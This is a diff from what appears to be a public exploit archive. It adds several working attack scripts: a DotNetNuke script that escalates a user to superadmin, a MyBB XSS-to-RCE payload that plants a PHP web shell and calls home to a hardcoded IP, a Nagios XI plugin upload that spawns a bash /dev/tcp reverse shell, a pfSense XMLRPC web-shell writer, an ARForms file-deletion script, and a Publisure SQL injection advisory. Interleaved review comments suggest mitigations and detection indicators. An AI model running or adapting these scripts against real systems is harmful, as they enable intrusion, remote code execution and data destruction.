else if (x1.responseType === "document") { + data = x1.responseXML; + } else { + data = x1.response; + } + + //console.log(JSON.parse(data)); + data = JSON.parse(data); + + for (var key in data['Notifications']){ + if (data['Notifications'][key]['Body'].includes(username)) { + resolve((data['Notifications'][key]['NotificationId'])); + }; + } + reject(); + } + } + x1.send(null); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function GetUserId(baseurl, username, tabid) { + return new Promise(function (resolve, reject) { + var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/" + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var x1 = new XMLHttpRequest(); + + x1.open("GET", baseurl + "/API/PersonaBar/Users/GetUsers?searchText=" + username + "&filter=0&pageIndex=0&pageSize=10&sortColumn=&sortAscending=false", true); + x1.setRequestHeader('TabId', tabid); + x1.onreadystatechange = () => { + if (x1.readyState == 4) { + if (!x1.responseType === "text") { + data = x1.responseText; + } else if (x1.responseType === "document") { + data = x1.responseXML; + } else { + data = x1.response; + } + + //console.log(data); + data = JSON.parse(data); + resolve((data['Results'][0]['userId'])); + + reject(); + } + } + x1.send(null); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + + +async function main(){ + var username = "nobody34567"; + var baseurl = "http://192.168.18.10/dotnetnuke/"; + var moduleid = "374"; + var tabid = "27"; //It's default ID of the module and tab, that should be used to get notification 
id. We can also parse it from the webpage. + var NotificationId = await GetNotification(baseurl, username, moduleid, tabid); + await ApproveNotification(baseurl, NotificationId); + var UserID = await GetUserId(baseurl, username, tabid); + MakeSuperAdmin(baseurl, UserID); +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/47161.php b/exploits/php/webapps/47161.php new file mode 100644 index 000000000..79b081f32 --- /dev/null +++ b/exploits/php/webapps/47161.php 
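Review bot: The header comment documents the attack chain for CVE-2019-13293 but gives a site owner nothing to act on, neither a fixed release nor what the activity looks like in logs. I would add two lines to that comment block: `Detection: an admin session loading /Activity-Feed/Messages/ and then POSTing to /API/InternalServices/NewUserNotificationService/Authorize and /API/PersonaBar/Users/UpdateSuperUserStatus with setSuperUser=true` and `Mitigation: upgrade to the vendor's fixed release (FIXED_VERSION_PLACEHOLDER) and review pending registrations for markup in Display Name`. The endpoint paths are taken from the script itself. The fixed version is not stated on the page and has to be filled in from the vendor advisory.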
@@ -0,0 +1,109 @@ +/* +# Exploit Title: MyBB < 1.8.21 Authenticated RCE +# Date: July 24, 2019 +# Exploit Author: Giovanni Chhatta (https://www.linkedin.com/in/giovannichhatta/) +# Vendor Homepage: https://mybb.com/ +# Software Link: https://resources.mybb.com/downloads/mybb_1820.zip +# Version: 1.8.20 +# Tested on: Windows 10 +# Blog: https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/ + +Example payload: [video=youtube]http://test/test#[url]onload='script=document.createElement(%22script%22);script.src=%22https://giovan.nl/mybb.js%22;document.body.append(script);'//[/url][/video] +This payload fetches another JS file (mybb.js), hosted on a VPS. + +NOTE: Mybb's textbox will dynamically change apostrophes (') to ' . To fix this just manually change them back to apostrophes and hit 'send'. +The payload will trigger once an admin views the message. +*/ + +/* + * mybb.js + */ + +function postReq(toUrl,body,setHeaders = true){ + var xhr = new XMLHttpRequest(); + xhr.open("POST",toUrl,false); + + if(setHeaders){ + xhr.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0"); + xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); + xhr.setRequestHeader("Accept-Language","nl,en-US;q=0.7,en;q=0.3"); + xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------21840354016818"); + xhr.setRequestHeader("Upgrade-Insecure-Requests","1"); + }else{ + xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + } + xhr.send(body); +} + +function getReq(toUrl, property = true){ + var xhr = new XMLHttpRequest(); + + xhr.open("GET",toUrl,false); + xhr.send(); + + prop = property ? 
xhr.responseText : xhr.status; + return prop; +} + +function upload(url,key,payload){ + url = url + "admin/index.php?module=style-themes&action=import"; + data = "-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"my_post_key\"\r\n\r\n"+key+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import\"\r\n\r\n0\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"local_file\"; filename=\"shel1l.xml\"\r\nContent-Type: text/xml\r\n\r\n"+payload+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"tid\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"version_compat\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_stylesheets\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_templates\"\r\n\r\n1\r\n-----------------------------21840354016818--\r\n"; + postReq(url,data); +} + +function fakeDiv(body){ + var div = document.createElement('div'); + div.innerHTML = body; + div.setAttribute("id","fakediv"); + + document.body.append(div); + var themeLink = document.getElementsByClassName("popup_item")[2].href; + var themeID = themeLink.substring(themeLink.indexOf("tid")+4,themeLink.length); + document.getElementById("fakediv").remove(); + return themeID; +} + +function getThemeID(url){ + url = url + "admin/index.php?module=style-themes"; + responseBody = getReq(url); + return fakeDiv(responseBody); +} + +function editStylesheet(url,key,tid,filename){ + url = url + "admin/index.php?module=style-themes&action=edit_stylesheet&mode=advanced"; + data = 
"my_post_key="+key+"&tid="+tid+"&file="+filename+"&stylesheet=%3C%3Fphp+system%28%24_GET%5B1%5D%29%3B+%3F%3E&save=Save+Changes"; + + postReq(url,data,false); + +} + +function checkShell(url,theme,filename){ + url = url + "cache/themes/theme" + theme + "/" + filename; + if(getReq(url,false) == 200){ + console.log("[*] Shell found in theme " + theme); + window.open(host + "cache/themes/theme"+theme+"/"+filename+"?1=whoami"); + }else{ + console.log("[!] Exploit failed: Couldn't find shell.") + } +} + +function callHome(theme){ + let IP = "10.11.6.96"; // Change this + let port = 1234; // Change this + + let url = "http://" + IP + ":" + port + "/" + document.domain + "/isPwned/theme" + theme; + + getReq(url); +} + +isAdmin = false; + +host = location.href.split('/')[0] + "//" + location.href.split('/')[2] + "/mybb/"; // Change last part +key = document.getElementsByName("my_post_key")[0].value; +filename = "910910910910910910910910xD.php"; +payload = "\r\n\r\n\r\n\r\ngecko\r\n\r\n\r\n" +upload(host,key,payload); +theme = getThemeID(host); +editStylesheet(host,key,theme,filename); + +isAdmin ? checkShell(host,theme,filename) : callHome(theme); \ No newline at end of file diff --git a/exploits/php/webapps/47299.php b/exploits/php/webapps/47299.php new file mode 100644 index 000000000..b9a5480ac --- /dev/null +++ b/exploits/php/webapps/47299.php 
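Review bot: The title gives the affected range as everything before 1.8.21 and the header links the write-up, but the file never says what an administrator should do or look for. A short addition to the first comment block would cover it: `Mitigation: upgrade to 1.8.21 or later (implied by the title; confirm against the vendor release notes)` and `Indicators: requests to admin/index.php?module=style-themes with action=import or action=edit_stylesheet, and any .php file under cache/themes/themeN/`. Both indicators come from `upload`, `editStylesheet` and `checkShell` in this hunk. Denying script execution under `cache/` looks like a reasonable hardening step regardless of version, though that is my inference and not something the page states.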
@@ -0,0 +1,219 @@ +loadHTML($response); + $xpath = new DOMXpath($DOM); + $input = $xpath->query('//input[@name="nsp"]'); + $nsp = $input->item(0)->getAttribute('value'); + + if (isset($nsp)) { + echo "[+] Extracted NSP - value: {$nsp}\n"; + } else { + echo "[+] Unable to obtain NSP from {$url}\n"; + exit(1); + } + + return $nsp; + +} + +function authenticate($userVal) { + + $postValues = array( + 'username' => $userVal['user'], 'password' => $userVal['pass'], + 'pageopt' => 'login', 'nsp' => $userVal['loginNSP'] + ); + + $curl = curl_init(); + + curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']); + curl_setopt($curl, CURLOPT_POST, TRUE); + curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues)); + curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); + curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt'); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); + curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + + echo "[+] Attempting to login...\n"; + curl_exec($curl); + if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') { + echo "[+] Authentication success\n"; + } else { + echo "[+] Unable to plguin, check your credentials\n"; + exit(1); + } + + echo "[+] Checking we have admin rights...\n"; + curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); + $response = curl_exec($curl); + + $title = NULL; + + $dom = new DOMDocument(); + if (@$dom->loadHTML($response)) { + $dom->getElementsByTagName("title")->length > 0 ? 
$title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE; + } + + if (strpos($title, 'Manage') !== FALSE) { + echo "[+] Admin access confirmed\n"; + } else { + echo "[+] Unable to reach login page, are you admin?\n"; + exit(1); + } + +} + +function uploadPayload($userVal) { + + $payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n"; + + $curl = curl_init(); + curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); + curl_setopt($curl, CURLOPT_POST, 1); + curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); + curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); + curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + + $headers = array(); + $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; + $headers[] = 'Accept-Language: en-GB,en;q=0.5'; + $headers[] = 'Referer: ' . 
$userVal['pluginUrl']; + $headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500'; + $headers[] = 'Connection: keep-alive'; + $headers[] = 'Upgrade-Insecure-Requests: 1'; + + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + + echo "[+] Uploading payload...\n"; + + $response = curl_exec($curl); + $dom = new DOMDocument(); + @$dom->loadHTML($response); + + $upload = FALSE; + + foreach ($dom->getElementsByTagName('div') as $div) { + + if ($div->getAttribute('class') === 'message') { + if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) { + $upload = TRUE; + } + } + } + + if ($upload) { + echo "[+] Payload uploaded\n"; + } else { + echo '[+] Unable to upload payload'; + exit(1); + } + +} + +function triggerPayload($userVal) { + + $curl = curl_init(); + curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + + $headers = array(); + $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; + $headers[] = 'Connection: keep-alive'; + $headers[] = 'Upgrade-Insecure-Requests: 1'; + + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + + echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n"; + + curl_exec($curl); + +} + +function showHelp() { + echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n"; + exit(0); +} + +function parseArgs($argv) { + + $userVal = array(); + for ($i = 1; $i < count($argv); $i++) { + if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) { + $userVal[$match[1]] = $match[2]; + } + } + + if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || 
!isset($userVal['reverseport'])) { + showHelp(); + } + + $userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://'; + $userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php'; + $userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php'; + $userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download'; + + return $userVal; + +} + +function checkCookie() { + if (file_exists('cookie.txt')) { + echo "cookie.txt already exists - delete prior to running"; + exit(1); + } +} \ No newline at end of file diff --git a/exploits/php/webapps/47359.txt b/exploits/php/webapps/47359.txt new file mode 100644 index 000000000..fff273015 --- /dev/null +++ b/exploits/php/webapps/47359.txt 
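Review bot: `authenticate` and `uploadPayload` send the administrator's username, password and session with `CURLOPT_SSL_VERIFYPEER` and `CURLOPT_SSL_VERIFYHOST` set to `FALSE`, and the session is persisted to `cookie.txt` in the working directory and never removed. On an authorised test that leaves a live admin session on disk and exposes the credentials to anyone able to intercept the connection. I would keep certificate verification on unless the operator explicitly opts out, and write the jar to a private temporary file (`$jar = tempnam(sys_get_temp_dir(), 'nxi');`) that is removed with `unlink($jar)` when the run ends. The text before `loadHTML($response)` is missing from the hunk as shown, so the function that extracts the NSP token is only partly visible and is not reviewed here.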
@@ -0,0 +1,97 @@ +##################################################################################### +# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain] +# Google Dork: [N/A] +# Date: [05/09/2019] +# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company] +# Vendor Homepage: [https://www.publisure.com/] +# Software Link: [N/C] +# Version: [version 2.1.2] +# Tested on: [Windows 7 Enterprise] +# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254] + +##################################################################################### +# Improper Access Control +# +# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) +# OVE ID: OVE-20190724-0002 +# CVE ID: CVE-2019-14253 +# +##################################################################################### +# (Pre-Authenticated) Multiples SQL injection +# +# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) +# OVE ID: OVE-20190724-0003 +# CVE ID: CVE-2019-14254 +# +##################################################################################### +# Unrestricted File Upload RCE +# +# CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) +# OVE ID: OVE-20190724-0004 +# CVE ID: CVE-2019-14252 +# +##################################################################################### +# Fixes: +# Upgrade to latest product version and/or contact support for patches +##################################################################################### + +I. PRODUCT + +Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. +The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution. + +Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released. + +II. 
ADVISORY + +A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application. + +III. VULNERABILITIES DESCRIPTIONS + +a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted. +b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions. +Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example). + +c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form. + This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file). + +IV. PROOF OF CONCEPT + +a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2) +b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli +"editUser.php" vulnerable code: $user = getUserDtails($_GET['id']); + +"userAccFunctions.php" vulnerable code example: + +function getUserDtails($id) { + global $db; + //The reseller_accounts table has been used to store department information since PDQit + $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id"; + $R = $db->query($Q); + return $R; +} + +c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: 
http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami) + + +V. RECOMMENDATIONS + +a) Restrict access to administrative (and other) folder when non authenticated. +b) Prepare SQL query before execution using PDO to escape injections. +c) Check file type on file upload forms to prevent PHP code upload instead of templates. + + +VI. TIMELINE + +July 23th, 2019: Vulnerability identification +July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement +August 13th, 2019: Contact to vendor to ask for fix - no reply +September 04th, 2019: Vendor was informed 24h before public disclosure +September 05th, 2019: public disclosure after 45 days + +VIII. LEGAL NOTICES + +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. + +The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy \ No newline at end of file diff --git a/exploits/php/webapps/47413.py b/exploits/php/webapps/47413.py new file mode 100755 index 000000000..355481786 --- /dev/null +++ b/exploits/php/webapps/47413.py 
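Review bot: The recommendations in section V are weaker than the findings in section III warrant. For (b), the quoted `getUserDtails` places `$id` from `$_GET['id']` directly into the statement, so the advice should be bound parameters, not escaping: `b) Use parameterised statements with bound values for every query, and reject a non-integer id.` For (c), a file-type check alone is easy to get wrong, so I would write `c) Allow-list template extensions, and store uploads outside the web root or disable PHP execution in /AdminDir/Templates.` For (a), it is worth stating that the authentication check has to run server-side in every script under /AdminDir. The section numbering also jumps from VI to VIII.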
@@ -0,0 +1,167 @@ +# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection +# Date: 23/09/2018 +# Author: Nassim Asrir +# Vendor Homepage: https://www.pfsense.org/ +# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# CVE: CVE-2019-16701 +# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 +###################################################################################################### + +1 : About Pfsense: +================== + +pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. + +2 : Technical Analysis: +======================= + +The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands. + +XMLRPC methods: + +pfsense.exec_shell +pfsense.exec_php +pfsense.filter_configure +pfsense.interfaces_carp_configure +pfsense.backup_config_section +pfsense.restore_config_section +pfsense.merge_config_section +pfsense.merge_installedpackages_section_xmlrpc +pfsense.host_firmware_version +pfsense.reboot +pfsense.get_notices +system.listMethods +system.methodHelp +system.methodSignature + +As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php. + +2 : Static Analysis: +==================== + +In the static analysis we will analysis the xmlrpc.php file. + +Line (73 - 82) + +This code check if the user have enough privileges. + +$user_entry = getUserEntry($username); + /* + * admin (uid = 0) is allowed + * or regular user with necessary privilege + */ + if (isset($user_entry['uid']) && $user_entry['uid'] != '0' && + !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { + log_auth("webConfigurator authentication error for '" . + $username . "' from " . $this->remote_addr . 
+ " not enough privileges"); + + +Line (137 - 146) + +This part of code is the interest for us. + +As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code). + + public function exec_php($code) { + $this->auth(); + + eval($code); + if ($toreturn) { + return $toreturn; + } + + return true; + } + +Line (155 - 160) + +In this part of code also we have a check for auth then the execution for ($code) + + public function exec_shell($code) { + $this->auth(); + + mwexec($code); + return true; + } + +3 - Exploit: +============ + +#!/usr/bin/env python + +import argparse +import requests +import urllib2 +import time +import sys +import string +import random + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1") +parser.add_argument("--password", help = "pfsense Password") +args = parser.parse_args() + +rhost = args.rhost +password = args.password +print "" + +print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection" +print "" +print "[+] Author: Nassim Asrir" +print "" + +command = "" +command += "" +command += "pfsense.host_firmware_version" +command += "" +command += ""+password+"" +command += "" +command += "" + +stage1 = rhost + "/xmlrpc.php" + +page = urllib2.urlopen(stage1, data=command).read() + +print "[+] Checking Login Creds" + + +if "Authentication failed" in page: + + print "[-] Wrong password :(" + sys.exit(0) +else: + + random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) + + print "[+] logged in successfully :)" + print "[+] Generating random file "+random+".php" + print "[+] Sending the exploit ....." + + + command = "" + command += "" + command += "pfsense.exec_php" + command += "" + command += ""+password+"" + command += "exec('echo \\'
  
\\' > /usr/local/www/"+random+".php');
" + command += "
" + command += "
" + +stage1 = rhost + "/xmlrpc.php" + +page = urllib2.urlopen(stage1, data=command).read() + +final = rhost+"/"+str(random)+".php" + +check = urllib2.urlopen(final) + +print "[+] Checking ....." + +if check.getcode() == 200: + + print "[+] Yeah! You got your shell: " + final+"?cmd=id" +else: + + print "[+] Sorry :( Shell not found check the path" \ No newline at end of file diff --git a/exploits/php/webapps/47443.rb b/exploits/php/webapps/47443.rb new file mode 100755 index 000000000..7cb5b5222 --- /dev/null +++ b/exploits/php/webapps/47443.rb 
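Review bot: The analysis text says the XMLRPC methods are open to "any authenticated user", but the `xmlrpc.php` check quoted a few lines later admits only uid 0 or an account holding `system-xmlrpc-ha-sync`, so the write-up overstates who can reach `exec_php` and `exec_shell`. I would reword that sentence to `# Requires admin (uid 0) or a user granted system-xmlrpc-ha-sync; not reachable by ordinary authenticated users`. The header's `Date: 23/09/2018` also predates the 2019 CVE id and looks like a typo worth confirming. For defenders the controls that matter are who holds that privilege and whether `/xmlrpc.php` is reachable from untrusted networks.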
@@ -0,0 +1,238 @@ +#!/usr/bin/env ruby + +# Exploit Title: WordPress Arforms - 3.7.1 +# CVE ID: CVE-2019-16902 +# Date: 2019-09-27 +# Exploit Author: Ahmad Almorabea +# Author Website: http://almorabea.net +# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt +# Software Link: https://www.arformsplugin.com/documentation/changelog/ +# Version: 3.7.1 + +#**************Start Notes************** +# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders. +# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet. +# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. +# But maybe in other forms maybe it's different so you have to change it accordingly. +# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on +# There is a request file with this Script make sure to put it in the same folder. +#**************End Notes**************** + +require "net/http" +require 'colorize' + +$host = ARGV[0] || "" +$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" + + + +def start_function () + + puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow + name = STDIN.gets + + if $host == "" + puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red + exit + end + + + check_existence_arform_folder + execute_deletion_attack + + puts "Done ... 
see ya " + name + +end + + +def send_checks(files_names) + + + + + j = 1 + while j <= files_names.length-1 + + uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS + + request = Net::HTTP::Get.new(uri.request_uri) + request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" + request["Connection"] = "keep-alive" + request["Accept-Language"] = "en-US,en;q=0.5" + request["Accept-Encoding"] = "gzip, deflate" + request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + + + begin + + response = http.request(request).code + puts "The File " + files_names[j] + " has the response code of " + response + rescue Exception => e + puts "[!] Failed!" + puts e + end + j = j+1 + end +end + + +def check_existence_arform_folder () + + + + path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] + $i = 0 + results = [] + + while $i <= path_array.length-1 + + uri = URI.parse("http://#{$host}/#{path_array[$i]}") + #puts uri + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + results[$i] = response.code + #puts"response code is : " + response.code + + $i +=1 + + end + + puts "****************************************************" + + if results[0] == "200" || results[0] =="301" + + puts "The Plugin is Available on the following path : ".green + $host + path_array[0] + else + puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red + exit + end + + if (results[1] == "200" || results[1] == "301") + + puts "The User Files folder is Available on the following path : ".green + $host + path_array[1] + else + + puts "We 
couldn't find the User Files folder, on the following path ".red + $host + path_array[1] + + end + puts "****************************************************" + + + +end + + +def execute_deletion_attack () + + + + puts "How many file you want to delete my man" + amount = STDIN.gets.chomp.to_i + + if(amount == 0) + puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue + exit + end + + file_names = [] + file_names[0] = "143_772_1569713145702_temp3.txt" + j = 1 + while j <= amount.to_i + puts "Name of the file number " + j.to_s + file_names[j] = STDIN.gets + file_names[j].strip! + j = j+1 + end + + + uri = URI.parse("http://#{$host}") + #puts uri + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie + + + + + $i = 0 + while $i <= file_names.length-1 + + puts "Starting the Attack Journey .. ".green + + uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") + headers = + { + 'Referer' => 'From The Sky', + 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', + 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', + 'Accept-Encoding' => 'gzip, deflate', + 'Cookie' => global_cookie, + 'X_FILENAME' => file_names[$i], + 'X-FILENAME' => file_names[$i], + 'Connection' => 'close' + + } + + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Post.new(uri.path, headers) + request.body = File.read("post_file") + response = http.request request + + $i = $i +1 + end + + execute_delete_request file_names,global_cookie,amount.to_i + + puts "Finished.........." 
+ +end + +def execute_delete_request (file_names,cookies,rounds ) + + + $i = 0 + + while $i <= file_names.length-1 + + puts "Starting the Attack on file No #{$i.to_s} ".green + + uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") + headers = + { + 'Referer' => 'From The Sky', + 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', + 'Accept' => '*/*', + 'Accept-Language' => 'en-US,en;q=0.5', + 'X-Requested-With'=> 'XMLHttpRequest', + 'Cookie' => cookies, + 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'close' + } + + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Post.new(uri.path,headers) + request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" + response = http.request(request) + + if $i != 0 + puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code + end + $i = $i +1 + + end + + send_checks file_names + +end + + +start_function() \ No newline at end of file diff --git a/exploits/php/webapps/48023.txt b/exploits/php/webapps/48023.txt new file mode 100644 index 000000000..996732f50 --- /dev/null +++ b/exploits/php/webapps/48023.txt 
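Review bot: The header never names the vulnerability class: the title is only `WordPress Arforms - 3.7.1`, and the sole description is the note that the version is "applicable to path traversal attack so you can delete files". A title along the lines of `# Exploit Title: WordPress Plugin ARForms 3.7.1 - Arbitrary File Deletion (path traversal)` would let readers triage the entry without reading the script; the affected action, `arf_delete_file`, is visible in the request body in `execute_delete_request`. The header also gives no fixed version, so this file does not tell an operator which release to upgrade to.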
@@ -0,0 +1,28 @@
+# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
+# Data: 2020-02-06
+# Exploit Author: Mehran Feizi
+# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+/viewtestdrive.php
+
+
+==========
+Vulnerable Source:
+==========
+Line6: if(isset($_GET['testid']))
